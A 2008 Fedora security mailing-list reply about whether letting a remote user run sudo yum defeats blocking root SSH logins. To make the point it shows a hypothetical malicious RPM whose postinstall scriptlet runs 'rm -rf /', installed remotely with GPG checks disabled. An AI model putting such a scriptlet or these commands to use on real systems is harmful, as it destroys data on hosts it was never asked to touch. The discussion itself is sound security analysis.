On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta@xxxxxx> wrote: > On Saturday 05 January 2008, Kevin Fenzi wrote: > > > > I find root ssh login handy for a number of reasons: > [...] > > - It's nice to be able to do for automated tasks (like say installing a > > single new package on 20 machines without having to login and sudo on > > each). > > "ssh -t $host sudo yum install $package" works for me... What about (supposing I know the password of non-root user 'foo', and assuming that 'foo' can sudo yum): [hacker@tooeasy]$ rpm -q --scripts hacker_pkg.rpm postinstall scriptlet (using /bin/sh): rm -rf / exit 0 [hacker@tooeasy]$ scp -p hackers_pkg.rpm foo@host: [hacker@tooeasy]$ ssh -t foo@host sudo yum localinstall --nogpgcheck ./hackers_pkg.rpm Am I wrong in assuming that yum is not necessarily a safe command to be used with sudo? Or more exactly, that there is no point in blocking root ssh logins if you're going to let a user that can login remotely use sudo on yum? Thanks. -- Fedora-security-list mailing list Fedora-security-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-security-list
